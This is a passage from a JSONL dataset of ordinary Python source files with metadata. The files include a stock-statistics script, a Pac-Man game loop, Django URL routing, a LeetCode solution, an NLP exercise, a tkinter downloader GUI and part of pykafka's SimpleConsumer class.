lows_list[i:i+recent_size]\n if len(consideration) == recent_size:\n chg = round(min(consider2)/ consideration[0],3)\n items.append(chg) \n\n if month6_changes:\n buy.addSortedHigh(\"m6_m_m\", statistics.median(month6_changes), astock, keeping = 40)\n\n try:\n md1 = statistics.median(items)\n except:\n print(\"items: {}\".format( items))\n print (\"problem1\")\n return\n\n try:\n drop_from = drop_froms[-1]\n except:\n print (\"problem2\")\n return\n\n drop_from_p = percentile(drop_froms)\n drop_from_p = drop_from_p if drop_from_p > 75 else None\n\n chg1p = percentile(one_day_changes, neg_only=True)\n chg1p = chg1p if chg1p > 75 else None\n beta = round(statistics.median(betas),2)\n\n one_month_negs = sum([1 if change < 1 else 0 for change in one_month_changes])\n pd1 = round(one_month_negs / len(one_month_changes),3)\n\n more20d = sum([1 if change < .80 else 0 for change in one_month_changes])\n\n wc1 = min(lowChanges)\n md = round(statistics.median(lowChanges),4)\n md2 = round(statistics.median(lowChanges[-40:]),4)\n mg = round(statistics.median(highChanges),4)\n dl = round(statistics.median(one_day_lows),4)\n gddif = round((((mg-1)*100)+(md-1)*100),4)\n target = round(c_close * md,2)\n m30c = round(statistics.median(one_month_changes),3)\n w30 = min(one_month_changes)\n\n p20 = round(float(np.percentile(lowChanges, 20)),3)\n\n chg30 = one_month_changes[-1]\n chg30p = percentile(one_month_changes, neg_only=True)\n chg30p = chg30p if chg30p > 75 else None\n\n if bta:\n buy.addPDic(astock, \"md\", md)\n buy.addPDic(astock, \"more20d\", more20d)\n buy.addPDic(astock, \"wc1\", wc1)\n buy.addPDic(astock, \"p20\", p20)\n buy.addPDic(astock, \"gddif\", gddif)\n# buy.addPDic(astock, \"beta\", beta, True)\n buy.addPDic(astock, \"m30c\", m30c)\n buy.addPDic(astock, \"pd1\", pd1, True)\n return\n\n chg1 = one_day_changes[-1] \n values = [\n (\"stock\",astock),\n (\"price\",c_close),\n (\"target\",target),\n (\"md\",md,'%'),\n (\"md1\",md1, '%'),\n (\"md2\",md2, '%'),\n (\"mg\",mg,'%'),\n (\"gddif\",gddif),\n (\"wc1\",wc1,'%'),\n (\"p20\",p20,'%'),\n (\"more20d\",more20d),\n (\"mc\", mc),\n (\"beta\",beta) ,\n (\"chg1\",chg1,'%'),\n (\"chg1p\", chg1p),\n (\"dropf\",drop_from,'%'),\n (\"dropfp\",drop_from_p),\n (\"pd1\",pd1,'o'),\n (\"chg30\",chg30, '%'),\n (\"chg30p\",chg30p),\n (\"m30c\",m30c, '%'),\n (\"owned\", buy.getFrom(\"ports\",astock)) \n ]\n\n try:\n order = buy.getFrom(\"orders\", astock)[0]\n order,value = order[1], round(order[0])\n ochg = order/c_close\n values.insert(3, (\"ochg\", ochg, \"%\"))\n values.insert(4, (\"value\", value))\n loc = \"_TO\" if astock in z.getp(\"torys\") else \"_PO\"\n values.append((\"location\", loc))\n except Exception as e:\n loc = \"\"\n ochg = \"NA\"\n value = \"NA\"\n values.insert(3, (\"ochg\", ochg, \"%\"))\n values.insert(4, (\"value\", value))\n values.append((\"location\", loc))\n\n# order = buy.getFrom(\"orders\", astock)\n# print(\"order : {}\".format( order ))\n# print(\"astock: {}\".format( astock))\n# exit()\n\n if args.came_from_list:\n values.append((args.args.stocks, args.came_from_dict[astock]))\n\n if not args.args.bta:\n values.append((\"bta\", buy.getFrom(\"savePsdic\", astock)))\n\n if store:\n table_print.store(values)\n else:\n chg5 = round(closes_list[-1] / closes_list[-5],3)\n return md, md1, md2, mg, gddif, chg1, chg1p, chg30, chg30p, chg5, wc1, target, c_close, m30c, w30, dl\n\ndef procs(astocks = None, title = None):\n if astocks:\n import sys\n current_module = sys.modules[__name__]\n current_module.stocks = astocks\n try:\n args.args.live\n except:\n import args as args\n\n for x,astock in enumerate(stocks):\n try:\n proc(astock, title)\n except Exception as e:\n print(\" current problem astock: {}\".format( astock))\n z.trace(e)\n pass\n\n if args.args.bta:\n buy.saveSorted(\"m6_m_m\")\n\n\nif __name__ == '__main__':\n procs()\n\n# if not debug:\n# print (\"NOT DEBUGGING\")\n# table_print.initiate()\n# if args.args.bta:\n# buy.savePs()\n","sub_path":"python/zen/current.py","file_name":"current.py","file_ext":"py","file_size_in_byte":8863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"232081426","text":"import pygame\nfrom pacman import Pacman\nfrom cenario import Cenario\nfrom fantasma import Fantasma\nfrom constants import *\n\npygame.init()\n\nscreen = pygame.display.set_mode((800, 600), 0)\n\nif __name__ == \"__main__\":\n size = 600 // 30\n clock = pygame.time.Clock()\n pacman = Pacman(size)\n blinky = Fantasma(VERMELHO, size)\n inky = Fantasma(CIANO, size)\n clyde = Fantasma(LARANJA, size)\n pinky = Fantasma(ROSA, size)\n cenario = Cenario(size, pacman)\n cenario.adicionar_movivel(pacman)\n cenario.adicionar_movivel(blinky)\n cenario.adicionar_movivel(inky)\n cenario.adicionar_movivel(clyde)\n cenario.adicionar_movivel(pinky)\n\n while True:\n # Calcular as regras\n if cenario.estado == JOGANDO:\n pacman.calcular_regras()\n blinky.calcular_regras()\n inky.calcular_regras()\n clyde.calcular_regras()\n pinky.calcular_regras()\n cenario.calcular_regras()\n\n # Pintar a tela\n screen.fill(PRETO)\n cenario.pintar(screen)\n pacman.pintar(screen)\n blinky.pintar(screen)\n inky.pintar(screen)\n clyde.pintar(screen)\n pinky.pintar(screen)\n pygame.display.update()\n clock.tick(30)\n\n # Captura os eventos\n eventos = pygame.event.get()\n cenario.processar_eventos(eventos)\n pacman.processar_eventos(eventos)\n","sub_path":"pacman/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"462533125","text":"import six\n__all__ = [\"merge_as_list\", \"ask_to_proceed_with_overwrite\"]\n\n\ndef merge_as_list(*args):\n out = []\n for x in args:\n if x is not None:\n if isinstance(x, (list, tuple)):\n out += x\n else:\n out += [x]\n return out\n\n\ndef ask_to_proceed_with_overwrite(filepath):\n \"\"\"Produces a prompt asking about overwriting a file.\n\n Parameters:\n filepath: the path to the file to be overwritten.\n\n Returns:\n True if we can proceed with overwrite, False otherwise.\n \"\"\"\n overwrite = six.moves.input('[WARNING] %s already exists - overwrite? '\n '[y/n]' % (filepath)).strip().lower()\n while overwrite not in ('y', 'n'):\n overwrite = six.moves.input('Enter \"y\" (overwrite) or \"n\" '\n '(cancel).').strip().lower()\n if overwrite == 'n':\n return False\n print('[TIP] Next time specify overwrite=True!')\n return True\n","sub_path":"graphgallery/utils/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"307154448","text":"def main():\r\n root=tk.Tk()\r\n root.title(\"Youtube Downloader\")\r\n root.geometry(\"800x400\")\r\n root.columnconfigure(0,weight=1)\r\n\r\n #ytdLabel\r\n ytdLabel=tk.Label(root,text=\"Enter your URL\")\r\n ytdLabel.grid()\r\n\r\n #Entry box\r\n ytdEntryVar=tk.StringVar\r\n ytdEntry=tk.Entry(root,width=50,textvariable=ytdEntryVar)\r\n ytdEntry.grid()\r\n\r\n #Url error msg\r\n ytdError=tk.Label(root,text=\"\",fg=\"red\")\r\n ytdError.grid()\r\n\r\n #save file\r\n saveLabel=tk.Label(root,text=\"Save the file\")\r\n saveLabel.grid()\r\n\r\n # Location error msg\r\n locationError=tk.Label(root,text=\"\",fg=\"red\")\r\n locationError.grid()\r\n\r\n # button save file\r\n saveEntry = tk.Button(root,bg=\"red\",text=\"Choose Path\", command=open_location(locationError))\r\n saveEntry.grid()\r\n\r\n #type video or audio\r\n ytdQuality= tk.Label(root,text=\"Select type\")\r\n ytdQuality.grid()\r\n\r\n #Combobox\r\n choices=[\"720p\",\"144p\",\"Only Audio\"]\r\n ydtChoices=ttk.Combobox(root,values=choices)\r\n ydtChoices.grid()\r\n\r\n #download button\r\n downloadbtn=tk.Button(root,text=\"Download\",command= download_video(ydtChoices,ytdEntry,ytdError,choices))\r\n downloadbtn.grid()\r\n\r\n # pycoders\r\n pycodersTeam = tk.Label(root, text=\"pycoders\")\r\n pycodersTeam.grid()\r\n\r\n root.mainloop()\r\n\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"108840138","text":"from django.conf.urls import patterns, include, url\nfrom django.conf.urls.static import static\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.contrib import admin\n\nimport settings\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n #url(r'^$', 'store.views.index', name='index'),\n\n url(r'^admin/', include(admin.site.urls)),\n\n\t# ex: /about/\n\turl(r'^about/$', 'store.views.about', name='about'),\n\t# ex: /store/2/\n\turl(r'^store/(?P<product_id>[0-9]+)/$', 'store.views.detail', name='detail'),\n\t# ex: /menu\n\turl(r'^menu/', 'store.views.menu', name='menu'),\n\t# ex: /search/pelmeni\n\turl(r'^search/$', 'store.views.search', name='search'),\n\n #url(r'^about/', include(\"store.urls\")),\n url(r'^$', include(\"store.urls\")),\n)# + static(settings.STATIC_URL, document_root=settings.STATIC_URL)\n\n#urlpatterns += staticfiles_urlpatterns()\n\n\nif settings.DEBUG:\n urlpatterns += patterns(\n 'django.views.static',\n (r'^media/(?P<path>.*)',\n 'serve',\n {'document_root': settings.MEDIA_ROOT}), )","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"160616950","text":"#https://leetcode.com/problems/valid-parentheses/description/\r\nclass Solution:\r\n def isValid(self, s):\r\n \"\"\"\r\n :type s: str\r\n :rtype: bool\r\n \"\"\"\r\n track_dict = {\"[]\":0, \"{}\":0, \"()\":0}\r\n one = list(\"[]\")\r\n two = list(\"{}\")\r\n three = list(\"()\")\r\n right = list(\")]}\")\r\n left = list(\"({[\")\r\n prev = \"\"\r\n bool_set = False\r\n opened_list = []\r\n \r\n for char in list(s):\r\n output, track_dict = self.checkBracket(char, track_dict, one, two, three)\r\n \r\n if bool_set:\r\n if char == output[1] and prev not in right and prev != output[0]:\r\n return False\r\n if char in left:\r\n opened_list.append(char)\r\n elif char in right:\r\n try:\r\n if opened_list.pop() not in output:\r\n return False\r\n except:\r\n continue\r\n \r\n bool_set = True\r\n prev = char\r\n \r\n for total in track_dict.values():\r\n if total != 0:\r\n return False\r\n return True\r\n \r\n def checkBracket(self, char, track_dict, one, two, three):\r\n \"\"\"\r\n :type char: str, track_dict: dict, one: list, two:list, three:list\r\n :rtype: list, dict \r\n \"\"\"\r\n if char in one:\r\n if char == one[0]:\r\n track_dict[\"[]\"] -= 1\r\n else:\r\n track_dict[\"[]\"] += 1\r\n return one, track_dict\r\n elif char in two:\r\n if char == two[0]:\r\n track_dict[\"{}\"] -= 1\r\n else:\r\n track_dict[\"{}\"] += 1\r\n return two, track_dict\r\n elif char in three:\r\n if char == three[0]:\r\n track_dict[\"()\"] -= 1\r\n else:\r\n track_dict[\"()\"] += 1\r\n return three, track_dict\r\n","sub_path":"LeetCode/Valid Parentheses.py","file_name":"Valid Parentheses.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"113487910","text":"from knock41 import sentences\n\n\nfor sentence in sentences:\n verb = ''; v_srcs = []\n particles = []\n arguments = []\n for chunk in sentence:\n\n #動詞決定\n for morph in chunk.morphs:\n if morph.pos == '動詞':\n verb = morph.base\n v_srcs += chunk.srcs\n \n if verb == '':\n continue\n \n #格パターン、項の抽出\n for src in v_srcs:\n particle = []\n argument = set()\n for morph in sentence[src].morphs:\n if morph.pos == '助詞':\n particle.append(morph.surface)\n argument.add(sentence[src].phrase)\n particles.extend(particle)\n arguments.extend(list(argument))\n\n particles = '\\t'.join(particles)\n arguments = '\\t'.join(arguments)\n if not particles == []:\n print(f'{verb}\\t{particles}\\t{arguments}')\n\n verb = ''; v_srcs = []\n particles = []\n arguments = []","sub_path":"masamune/chapter05/knock46.py","file_name":"knock46.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"495134485","text":"from __future__ import division\n\"\"\"\nAuthor: Emmett Butler\n\"\"\"\n__license__ = \"\"\"\nCopyright 2015 Parse.ly, Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n__all__ = [\"SimpleConsumer\"]\nimport itertools\nimport logging\nimport time\nimport threading\nfrom collections import defaultdict\nfrom Queue import Queue, Empty\n\nimport base\nfrom .common import OffsetType\nfrom .utils.compat import Semaphore\nfrom .exceptions import (OffsetOutOfRangeError, UnknownTopicOrPartition,\n OffsetMetadataTooLarge, OffsetsLoadInProgress,\n NotCoordinatorForConsumer, SocketDisconnectedError,\n ConsumerStoppedException, ERROR_CODES)\nfrom .protocol import (PartitionFetchRequest, PartitionOffsetCommitRequest,\n PartitionOffsetFetchRequest, PartitionOffsetRequest)\nfrom .utils.error_handlers import handle_partition_responses, raise_error\n\n\nlog = logging.getLogger(__name__)\n\n\nclass SimpleConsumer(base.BaseSimpleConsumer):\n \"\"\"\n A non-balancing consumer for Kafka\n \"\"\"\n def __init__(self,\n topic,\n cluster,\n consumer_group=None,\n partitions=None,\n fetch_message_max_bytes=1024 * 1024,\n num_consumer_fetchers=1,\n auto_commit_enable=False,\n auto_commit_interval_ms=60 * 1000,\n queued_max_messages=2000,\n fetch_min_bytes=1,\n fetch_wait_max_ms=100,\n refresh_leader_backoff_ms=200,\n offsets_channel_backoff_ms=1000,\n offsets_commit_max_retries=5,\n auto_offset_reset=OffsetType.LATEST,\n consumer_timeout_ms=-1,\n auto_start=True,\n reset_offset_on_start=False):\n \"\"\"Create a SimpleConsumer.\n\n Settings and default values are taken from the Scala\n consumer implementation. Consumer group is included\n because it's necessary for offset management, but doesn't imply\n that this is a balancing consumer. Use a BalancedConsumer for\n that.\n\n :param topic: The topic this consumer should consume\n :type topic: :class:`pykafka.topic.Topic`\n :param cluster: The cluster to which this consumer should connect\n :type cluster: :class:`pykafka.cluster.Cluster`\n :param consumer_group: The name of the consumer group this consumer\n should use for offset committing and fetching.\n :type consumer_group: str\n :param partitions: Existing partitions to which to connect\n :type partitions: Iterable of :class:`pykafka.partition.Partition`\n :param fetch_message_max_bytes: The number of bytes of messages to\n attempt to fetch\n :type fetch_message_max_bytes: int\n :param num_consumer_fetchers: The number of workers used to make\n FetchRequests\n :type num_consumer_fetchers: int\n :param auto_commit_enable: If true, periodically commit to kafka the\n offset of messages already fetched by this consumer. This also\n requires that `consumer_group` is not `None`.\n :type auto_commit_enable: bool\n :param auto_commit_interval_ms: The frequency (in milliseconds) at which the\n consumer offsets are committed to kafka. This setting is ignored if\n `auto_commit_enable` is `False`.\n :type auto_commit_interval_ms: int\n :param queued_max_messages: Maximum number of messages buffered for\n consumption\n :type queued_max_messages: int\n :param fetch_min_bytes: The minimum amount of data (in bytes) the server\n should return for a fetch request. If insufficient data is available\n the request will block until sufficient data is available.\n :type fetch_min_bytes: int\n :param fetch_wait_max_ms: The maximum amount of time (in milliseconds)\n the server will block before answering the fetch request if there\n isn't sufficient data to immediately satisfy `fetch_min_bytes`.\n :type fetch_wait_max_ms: int\n :param refresh_leader_backoff_ms: Backoff time (in milliseconds) to\n refresh the leader of a partition after the consumer loses the\n current leader.\n :type refresh_leader_backoff_ms: int\n :param offsets_channel_backoff_ms: Backoff time (in milliseconds) to\n retry offset commits/fetches\n :type offsets_channel_backoff_ms: int\n :param offsets_commit_max_retries: Retry the offset commit up to this\n many times on failure.\n :type offsets_commit_max_retries: int\n :param auto_offset_reset: What to do if an offset is out of range. This\n setting indicates how to reset the consumer's internal offset\n counter when an `OffsetOutOfRangeError` is encountered.\n :type auto_offset_reset: :class:`pykafka.common.OffsetType`\n :param consumer_timeout_ms: Amount of time (in milliseconds) the\n consumer may spend without messages available for consumption\n before raising an error.\n :type consumer_timeout_ms: int\n :param auto_start: Whether the consumer should begin communicating\n with kafka after __init__ is complete. If false, communication\n can be started with `start()`.\n :type auto_start: bool\n :param reset_offset_on_start: Whether the consumer should reset its\n internal offset counter to `self._auto_offset_reset` and commit that\n offset immediately upon starting up\n :type reset_offset_on_start: bool\n \"\"\"\n self._cluster = cluster\n self._consumer_group = consumer_group\n self._topic = topic\n self._fetch_message_max_bytes = fetch_message_max_bytes\n self._fetch_min_bytes = fetch_min_bytes\n self._queued_max_messages = queued_max_messages\n self._num_consumer_fetchers = num_consumer_fetchers\n self._fetch_wait_max_ms = fetch_wait_max_ms\n self._consumer_timeout_ms = consumer_timeout_ms\n self._offsets_channel_backoff_ms = offsets_channel_backoff_ms\n self._auto_offset_reset = auto_offset_reset\n self._offsets_commit_max_retries = offsets_commit_max_retries\n # not directly configurable\n self._offsets_fetch_max_retries = offsets_commit_max_retries\n self._offsets_reset_max_retries = offsets_commit_max_retries\n self._auto_start = auto_start\n self._reset_offset_on_start = reset_offset_on_start\n\n # incremented for any message arrival from any partition\n # the initial value is 0 (no messages waiting)\n self._messages_arrived = Semaphore(value=0)\n\n self._auto_commit_enable = auto_commit_enable\n self._auto_commit_interval_ms = auto_commit_interval_ms\n self._last_auto_commit = time.time()\n\n self._discover_offset_manager()\n\n if partitions:\n self._partitions = dict((OwnedPartition(p, self._messages_arrived), p)\n for p in partitions)\n else:\n self._partitions = dict((OwnedPartition(p, self._messages_arrived),\n topic.partitions[k])\n for k, p in topic.partitions.iteritems())\n self._partitions_by_id = dict((p.partition.id, p)\n for p in self._partitions.iterkeys())\n # Organize partitions by leader for efficient queries\n self._partitions_by_leader = defaultdict(list)\n for p in self._partitions.iterkeys():\n self._partitions_by_leader[p.partition.leader].append(p)\n self.partition_cycle = itertools.cycle(self._partitions.keys())\n\n self._default_error_handlers = self._build_default_error_handlers()\n\n self._running = False\n if self._auto_start:\n self.start()\n\n def __repr__(self):\n return \"<{module}.{name} at {id_} (consumer_group={group})>\".format(\n module=self.__class__.__module__,\n name=self.__class__.__name__,\n id_=hex(id(self)),\n group=self._consumer_group\n )\n\n def start(self):\n \"\"\"Begin communicating with Kafka, including setting up worker threads\n\n Fetches offsets, starts an offset autocommitter worker pool, and\n starts a message fetcher worker pool.\n \"\"\"\n self._running = True\n\n # Figure out which offset wer're starting on\n if self._reset_offset_on_start:\n self._reset_offsets()\n # make sure the reset is saved in kafka before it can rebalance\n self.commit_offsets()\n elif self._consumer_group is not None:\n self.fetch_offsets()\n\n self._fetch_workers = self._setup_fetch_workers()\n\n if self._auto_commit_enable:\n self._autocommit_worker_thread = self._setup_autocommit_worker()\n\n def _build_default_error_handlers(self):\n \"\"\"Set up the error handlers to use for partition errors.\"\"\"\n def _handle_OffsetOutOfRangeError(parts):\n self._reset_offsets([owned_partition\n for owned_partition, pres in parts])\n\n def _handle_NotCoordinatorForConsumer(parts):\n self._discover_offset_manager()\n\n return {\n UnknownTopicOrPartition.ERROR_CODE: lambda p: raise_error(UnknownTopicOrPartition),\n OffsetOutOfRangeError.ERROR_CODE: _handle_OffsetOutOfRangeError,\n OffsetMetadataTooLarge.ERROR_CODE: lambda p: raise_error(OffsetMetadataTooLarge),\n NotCoordinatorForConsumer.ERROR_CODE: _handle_NotCoordinatorForConsumer\n }\n\n def _discover_offset_manager(self):\n \"\"\"Set the offset manager for this consumer.\n\n If a consumer group is not supplied to __init__, this method does nothing\n \"\"\"\n if self._consumer_group is not None:\n self._offset_manager = self._cluster.get_offset_manager(self._consumer_group)\n\n @property\n def topic(self):\n \"\"\"The topic this consumer consumes\"\"\"\n return self._topic\n\n @property\n def partitions(self):\n \"\"\"A list of the partitions that this consumer consumes\"\"\"\n return self._partitions\n\n def __del__(self):\n \"\"\"Stop consumption and workers when object is deleted\"\"\"\n self.stop()\n\n def stop(self):\n \"\"\"Flag all running workers for deletion.\"\"\"\n self._running = False\n\n def _setup_autocommit_worker(self):\n \"\"\"Start the autocommitter thread\"\"\"\n def autocommitter():\n while True:\n if not self._running:\n break\n if self._auto_commit_enable:\n self._auto_commit()\n time.sleep(self._auto_commit_interval_ms / 1000)\n log.debug(\"Autocommitter thread exiting\")\n log.debug(\"Starting autocommitter thread\")\n return self._cluster.handler.spawn(autocommitter)\n\n def _setup_fetch_workers(self):\n \"\"\"Start the fetcher threads\"\"\"\n def fetcher():\n while True:\n if not self._running:\n break\n self.fetch()\n time.sleep(.0001)\n log.debug(\"Fetcher thread exiting\")\n log.info(\"Starting %s fetcher threads\", self._num_consumer_fetchers)\n return [self._cluster.handler.spawn(fetcher)\n for i in xrange(self._num_consumer_fetchers)]\n\n def __iter__(self):\n \"\"\"Yield an infinite stream of messages until the consumer times out\"\"\"\n while True:\n message = self.consume(block=True)\n if not message:\n raise StopIteration\n yield message\n\n def consume(self, block=True):\n \"\"\"Get one message from the consumer.\n\n :param block: Whether to block while waiting for a message\n :type block: bool\n \"\"\"\n timeout = None\n if block:\n if self._consumer_timeout_ms > 0:\n timeout = float(self._consumer_timeout_ms) / 1000\n else:\n timeout = 1.0\n\n while True:\n if self._messages_arrived.acquire(blocking=block, timeout=timeout):\n # by passing through this semaphore, we know that at\n # least one message is waiting in some queue.\n message = None\n while not message:\n owned_partition = self.partition_cycle.next()\n message = owned_partition.consume()\n return message\n else:\n if not self._running:\n raise ConsumerStoppedException()\n elif not block or self._consumer_timeout_ms > 0:\n return None\n\n def _auto_commit(self):\n \"\"\"Commit offsets only if it's time to do so\"\"\"\n if not self._auto_commit_enable or self._auto_commit_interval_ms == 0:\n return\n\n if (time.time() - self._last_auto_commit) * 1000.0 >= self._auto_commit_interval_ms:\n log.info(\"Autocommitting consumer offset for consumer group %s and topic %s\",\n self._consumer_group, self._topic.name)\n self.commit_offsets()\n self._last_auto_commit = time.time()\n\n def commit_offsets(self):\n \"\"\"Commit offsets for this consumer's partitions\n\n Uses the offset commit/fetch API\n \"\"\"\n if not self._consumer_group:\n raise Exception(\"consumer group must be specified to commit offsets\")\n\n reqs = [p.build_offset_commit_request() for p in self._partitions.keys()]\n log.debug(\"Committing offsets for %d partitions to broker id %s\", len(reqs),\n self._offset_manager.id)\n for i in xrange(self._offsets_commit_max_retries):\n if i > 0:\n log.debug(\"Retrying\")\n time.sleep(i * (self._offsets_channel_backoff_ms / 1000))\n\n response = self._offset_manager.commit_consumer_group_offsets(\n self._consumer_group, 1, 'pykafka', reqs)\n parts_by_error = handle_partition_responses(\n response,\n self._default_error_handlers,\n partitions_by_id=self._partitions_by_id)\n if len(parts_by_error) == 1 and 0 in parts_by_error:\n break\n log.error(\"Error committing offsets for topic %s (errors: %s)\",\n self._topic.name,\n dict((ERROR_CODES[err], [op.partition.id for op, _ in parts])\n for err, parts in parts_by_error.iteritems()))\n\n # retry only the partitions that errored\n if 0 in parts_by_error:\n parts_by_error.pop(0)\n errored_partitions = [op for code, err_group in parts_by_error.iteritems()\n for op, res in err_group]\n reqs = [p.build_offset_commit_request() for p in errored_partitions]\n\n def fetch_offsets(self):\n \"\"\"Fetch offsets for this consumer's topic\n\n Uses the offset commit/fetch API\n\n :return: List of (id, :class:`pykafka.protocol.OffsetFetchPartitionResponse`)\n tuples\n \"\"\"\n if not self._consumer_group:\n raise Exception(\"consumer group must be specified to fetch offsets\")\n\n def _handle_success(parts):\n for owned_partition, pres in parts:\n log.debug(\"Set offset for partition %s to %s\",\n owned_partition.partition.id,\n pres.offset)\n owned_partition.set_offset(pres.offset)\n\n reqs = [p.build_offset_fetch_request() for p in self._partitions.keys()]\n success_responses = []\n\n log.debug(\"Fetching offsets for %d partitions from broker id %s\", len(reqs),\n self._offset_manager.id)\n\n for i in xrange(self._offsets_fetch_max_retries):\n if i > 0:\n log.debug(\"Retrying offset fetch\")\n\n res = self._offset_manager.fetch_consumer_group_offsets(self._consumer_group, reqs)\n parts_by_error = handle_partition_responses(\n res,\n self._default_error_handlers,\n success_handler=_handle_success,\n partitions_by_id=self._partitions_by_id)\n\n success_responses.extend([(op.partition.id, r)\n for op, r in parts_by_error.get(0, [])])\n if len(parts_by_error) == 1 and 0 in parts_by_error:\n return success_responses\n log.error(\"Error fetching offsets for topic %s (errors: %s)\",\n self._topic.name,\n dict((ERROR_CODES[err], [op.partition.id for op, _ in parts])\n for err, parts in parts_by_error.iteritems()))\n\n time.sleep(i * (self._offsets_channel_backoff_ms / 1000))\n\n # retry only specific error responses\n to_retry = []\n to_retry.extend(parts_by_error.get(OffsetsLoadInProgress.ERROR_CODE, []))\n to_retry.extend(parts_by_error.get(NotCoordinatorForConsumer.ERROR_CODE, []))\n reqs = [p.build_offset_fetch_request() for p, _ in to_retry]\n\n def _reset_offsets(self, partitions=None):\n \"\"\"Reset offsets after an error\n\n Issue an OffsetRequest for each partition and set the appropriate\n returned offset in the OwnedPartition per self._auto_offset_reset\n\n :param partitions: the partitions for which to reset offsets\n :type partitions: Iterable of\n :class:`pykafka.simpleconsumer.OwnedPartition`\n \"\"\"\n def _handle_success(parts):\n for owned_partition, pres in parts:\n # offset_latest requests return the next offset to consume,\n # so account for this here by passing offset - 1\n owned_partition.set_offset(pres.offset[0] - 1)\n\n if partitions is None:\n partitions = self._partitions.keys()\n\n log.info(\"Resetting offsets for %s partitions\", len(list(partitions)))\n\n for i in xrange(self._offsets_reset_max_retries):\n # group partitions by leader\n by_leader = defaultdict(list)\n for p in partitions:\n by_leader[p.partition.leader].append(p)\n\n # get valid offset ranges for each partition\n for broker, owned_partitions in by_leader.iteritems():\n reqs = [owned_partition.build_offset_request(self._auto_offset_reset)\n for owned_partition in owned_partitions]\n response = broker.request_offset_limits(reqs)\n parts_by_error = handle_partition_responses(\n response,\n self._default_error_handlers,\n success_handler=_handle_success,\n partitions_by_id=self._partitions_by_id)\n\n if len(parts_by_error) == 1 and 0 in parts_by_error:\n break\n log.error(\"Error resetting offsets for topic %s (errors: %s)\",\n self._topic.name,\n dict((ERROR_CODES[err], [op.partition.id for op, _ in parts])\n for err, parts in parts_by_error.iteritems()))\n\n time.sleep(i * (self._offsets_channel_backoff_ms / 1000))\n\n if 0 in parts_by_error:\n parts_by_error.pop(0)\n partitions = []\n partitions.extend(\n [part for errcode, parts in parts_by_error.iteritems()\n for part in parts])\n\n def fetch(self):\n \"\"\"Fetch new messages for all partitions\n\n Create a FetchRequest for each broker and send it. Enqueue each of the\n returned messages in the approprate OwnedPartition.\n \"\"\"\n def _handle_success(parts):\n for owned_partition, pres in parts:\n if len(pres.messages) > 0:\n log.debug(\"Fetched %s messages for partition %s\",\n len(pres.messages), owned_partition.partition.id)\n owned_partition.enqueue_messages(pres.messages)\n log.debug(\"Partition %s queue holds %s messages\",\n owned_partition.partition.id,\n owned_partition.message_count)\n\n for broker, owned_partitions in self._partitions_by_leader.iteritems():\n partition_reqs = {}\n for owned_partition in owned_partitions:\n # attempt to acquire lock, just pass if we can't\n if owned_partition.lock.acquire(False):\n partition_reqs[owned_partition] = None\n if owned_partition.message_count < self._queued_max_messages:\n fetch_req = owned_partition.build_fetch_request(\n self._fetch_message_max_bytes)\n partition_reqs[owned_partition] = fetch_req\n else:\n log.debug(\"Partition %s above max queued count (queue has %d)\",\n owned_partition.partition.id,\n owned_partition.message_count)\n if partition_reqs:\n try:\n response = broker.fetch_messages(\n [a for a in partition_reqs.itervalues() if a],\n timeout=self._fetch_wait_max_ms,\n min_bytes=self._fetch_min_bytes\n )\n except SocketDisconnectedError:\n # If the broker dies while we're supposed to stop,\n # it's fine, and probably an integration test.\n if not self._running:\n return\n else:\n raise\n handle_partition_responses(\n response,\n self._default_error_handlers,\n success_handler=_handle_success,\n partitions_by_id=self._partitions_by_id)\n for owned_partition in partition_reqs.iterkeys():\n owned_partition.lock.release()\n\n\nclass OwnedPartition(object):\n \"\"\"A partition that is owned by a SimpleConsumer.\n\n Used to keep track of offsets and the internal message queue.\n \"\"\"\n\n def __init__(self,\n partition,\n semaphore=None):\n \"\"\"\n :param partition: The partition to hold\n :type partition: :class:`pykafka.partition.Partition`\n :param semaphore: A Semaphore that counts available messages and\n facilitates non-busy blocking\n :type semaphore: :class:`pykafka.utils.compat.Semaphore`\n \"\"\"\n self.partition = partition\n self._messages = Queue()\n self._messages_arrived = semaphore\n self.last_offset_consumed = 0\n self.next_offset = 0\n self.lock = threading.Lock()\n\n @property\n def message_count(self):\n \"\"\"Count of messages currently in this partition's internal queue\"\"\"\n return self._messages.qsize()\n\n def set_offset(self, last_offset_consumed):\n \"\"\"Set the internal offset counters\n\n :param last_offset_consumed: The last committed offset for this\n partition\n :type last_offset_consumed: int\n \"\"\"\n self.last_offset_consumed = last_offset_consumed\n self.next_offset = last_offset_consumed + 1\n\n def build_offset_request(self, auto_offset_reset):\n \"\"\"Create a :class:`pykafka.protocol.PartitionOffsetRequest` for this\n partition\n\n :param auto_offset_reset: What to do if an offset is out of range. This\n setting indicates how to reset the consumer's internal offset\n counter when an OffsetOutOfRangeError is encountered.\n :type auto_offset_reset: :class:`pykafka.common.OffsetType`\n \"\"\"\n return PartitionOffsetRequest(\n self.partition.topic.name, self.partition.id,\n auto_offset_reset, 1)\n\n def build_fetch_request(self, max_bytes):\n \"\"\"Create a 